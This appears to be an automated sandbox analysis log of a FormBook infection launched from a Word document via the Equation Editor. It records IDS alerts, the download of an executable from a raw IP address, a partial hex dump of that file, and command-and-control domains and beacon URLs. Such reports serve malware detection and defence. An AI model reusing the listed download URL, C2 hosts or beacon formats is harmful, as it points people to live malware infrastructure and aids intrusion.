      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
      Source: global trafficTCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.22:49164 -> 13.248.213.45:80
      Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.22:49164 -> 13.248.213.45:80
      Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.22:49164 -> 13.248.213.45:80
      Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.22:49165 -> 68.66.226.117:80
      Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.22:49165 -> 68.66.226.117:80
      Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.22:49165 -> 68.66.226.117:80
      Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 87.120.84.38:80 -> 192.168.2.22:49163
      Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 87.120.84.38:80 -> 192.168.2.22:49163
      Source: Network trafficSuricata IDS: 2827449 - Severity 1 - ETPRO EXPLOIT Adobe EMF File Memory Corrpution Vulnerability Inbound (CVE-2017-3123) : 87.120.84.38:80 -> 192.168.2.22:49163
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeDomain query: www.launchyouglobal.com
      Source: C:\Windows\explorer.exeDomain query: www.ko-or-a-news.com
      Source: C:\Windows\explorer.exeNetwork Connect: 68.66.226.117 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.affirmationtotebags.com
      Source: C:\Windows\explorer.exeDomain query: www.education2jobs.com
      Source: C:\Windows\explorer.exeDomain query: www.thecareskin.com
      Source: C:\Windows\explorer.exeDomain query: www.opmk.monster
      Source: C:\Windows\explorer.exeNetwork Connect: 13.248.213.45 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.mbbwa4wp.cfd
      Source: C:\Windows\explorer.exeDomain query: www.fcno30.com
      Source: C:\Windows\explorer.exeDomain query: www.lifeofthobes.uk
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: www.lifeofthobes.uk/btrd/
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.26.2Date: Wed, 30 Oct 2024 07:37:29 GMTContent-Type: application/x-msdos-programContent-Length: 662016Connection: keep-aliveLast-Modified: Wed, 30 Oct 2024 02:32:29 GMTETag: "a1a00-625a88369ea83"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 64 9a 21 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 fe 09 00 00 1a 00 00 00 00 00 00 e2 1d 0a 00 00 20 00 00 00 20 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 1d 0a 00 4f 00 00 00 00 20 0a 00 20 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e8 fd 09 00 00 20 00 00 00 fe 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 17 00 00 00 20 0a 00 00 18 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 0a 00 00 02 00 00 00 18 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c4 1d 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 0c 71 00 00 c4 67 00 00 03 00 00 00 81 00 00 06 d0 d8 00 00 c0 44 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 01 00 12 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 28 17 00 00 0a 0a 2b 00 06 2a 00 00 13 30 02 00 13 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 03 28 18 00 00 0a 0a 2b 00 06 2a 00 13 30 03 00 14 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 03 04 28 19 00 00 0a 0a 2b 00 06 2a 13 30 04 00 15 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 03 04 05 28 1a 00 00 0a 0a 2b 00 06 2a 00 00 00 13 30 05 00 17 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 03 04 05 0e 04 28 1b 00 00 0a 0a 2b 00 06 2a 00 13 30 06 00 19 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 03 04 05 0e 04 0e 05 28 1c 00 00 0a 0a 2b 00 06 2a 00 00 00 13 30 02 00 19 00 00 00 01 00 00 11 00 02 80 01 00 00 04 28 18 00 00 06 00 02 03 28 1d 00 00 0a 0a 2b 00 06 2a 00 00 00 13 30 03 00 1a 00 00 00 01 00 00 11 00 02 80 01 00 00 04 28 18 00 00 06 00 02 03 04 28 1e 00 00 0a 0a 2b 00 06 2a 00 00 13 30 04 00 1b 00 00 00 01 00 00 11 00 02 80 01 00 00 04 28 18 00 00 06 00 02 03 04 05
      Source: global trafficHTTP traffic detected: GET /btrd/?dnpxPL=MPO8Ot&NPY8=AbeIgGnzBU83HSXrQkpvN+QaXMHa/Smw3FQvIGYyvMJrWwYzMis5HD6DdthggtUmTF7mFQ== HTTP/1.1Host: www.thecareskin.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /btrd/?NPY8=Aqp/nEdW5fSRgBppOcSBDZbXY4IaYVD9lzqE2utQjmbccywWz39dK6w1iF5Po1lTCoAGbA==&dnpxPL=MPO8Ot HTTP/1.1Host: www.fcno30.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 13.248.213.45 13.248.213.45
      Source: Joe Sandbox ViewIP Address: 87.120.84.38 87.120.84.38
      Source: Joe Sandbox ViewIP Address: 68.66.226.117 68.66.226.117
      Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
      Source: Joe Sandbox ViewASN Name: SHARCOM-ASBG SHARCOM-ASBG
      Source: Joe Sandbox ViewASN Name: A2HOSTINGUS A2HOSTINGUS
      Source: global trafficHTTP traffic detected: GET /txt/4q0pGnqqpgTTSL7.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 87.120.84.38Connection: Keep-Alive
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
      Source: C:\Windows\explorer.exeCode function: 9_2_08CDDF82 getaddrinfo,setsockopt,recv,9_2_08CDDF82
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E7B21753-11AB-4008-8617-6E8AEEEB606B}.tmpJump to behavior
      Source: global trafficHTTP traffic detected: GET /txt/4q0pGnqqpgTTSL7.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 87.120.84.38Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /btrd/?dnpxPL=MPO8Ot&NPY8=AbeIgGnzBU83HSXrQkpvN+QaXMHa/Smw3FQvIGYyvMJrWwYzMis5HD6DdthggtUmTF7mFQ== HTTP/1.1Host: www.thecareskin.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /btrd/?NPY8=Aqp/nEdW5fSRgBppOcSBDZbXY4IaYVD9lzqE2utQjmbccywWz39dK6w1iF5Po1lTCoAGbA==&dnpxPL=MPO8Ot HTTP/1.1Host: www.fcno30.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficDNS traffic detected: DNS query: www.education2jobs.com
      Source: global trafficDNS traffic detected: DNS query: www.lifeofthobes.uk
      Source: global trafficDNS traffic detected: DNS query: www.thecareskin.com
      Source: global trafficDNS traffic detected: DNS query: www.opmk.monster
      Source: global trafficDNS traffic detected: DNS query: www.affirmationtotebags.com
      Source: global trafficDNS traffic detected: DNS query: www.mbbwa4wp.cfd
      Source: global trafficDNS traffic detected: DNS query: www.fcno30.com
      Source: global trafficDNS traffic detected: DNS query: www.ko-or-a-news.com
      Source: global trafficDNS traffic detected: DNS query: www.launchyouglobal.com
      Source: global trafficDNS traffic detected: DNS query: www.trygenesisx.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 30 Oct 2024 07:40:34 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniffData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background
      Source: EQNEDT32.EXE, 00000002.00000002.408279812.00000000008DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.38/txt/4q0pGnqqpgTTSL7.exe
      Source: EQNEDT32.EXE, 00000002.00000002.408279812.00000000008DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.38/txt/4q0pGnqqpgTTSL7.exeC:
      Source: EQNEDT32.EXE, 00000002.00000002.408279812.00000000008DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.38/txt/4q0pGnqqpgTTSL7.exej
      Source: EQNEDT32.EXE, 00000002.00000002.408279812.00000000008DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.38/txt/4q0pGnqqpgTTSL7.exettC:
      Source: explorer.exe, 00000009.00000000.420803319.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.928404044.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
      Source: ihbgfbin.exe, 00000005.00000002.421951115.0000000002524000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.affirmationtotebags.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.affirmationtotebags.com/btrd/
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.affirmationtotebags.com/btrd/www.mbbwa4wp.cfd
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.affirmationtotebags.comReferer:
      Source: explorer.exe, 00000009.00000000.420803319.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.928404044.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.docemimocasamentos.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.docemimocasamentos.com/btrd/
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.docemimocasamentos.com/btrd/www.solarcyborg.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.docemimocasamentos.comReferer:
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.education2jobs.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.education2jobs.com/btrd/
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.education2jobs.com/btrd/www.lifeofthobes.uk
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.education2jobs.comReferer:
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fcno30.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fcno30.com/btrd/
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fcno30.com/btrd/www.ko-or-a-news.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fcno30.comReferer:
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gynlkj.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gynlkj.com/btrd/
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gynlkj.com/btrd/www.docemimocasamentos.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gynlkj.comReferer:
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jejeesclothing.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jejeesclothing.com/btrd/
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jejeesclothing.com/btrd/www.nashexshop.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jejeesclothing.comReferer:
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ko-or-a-news.com
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ko-or-a-news.com/btrd/
      Source: explorer.exe, 00000009.00000002.929866992.0000000007524000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ko-or-a-news.com/btrd/www.launchyouglobal.com
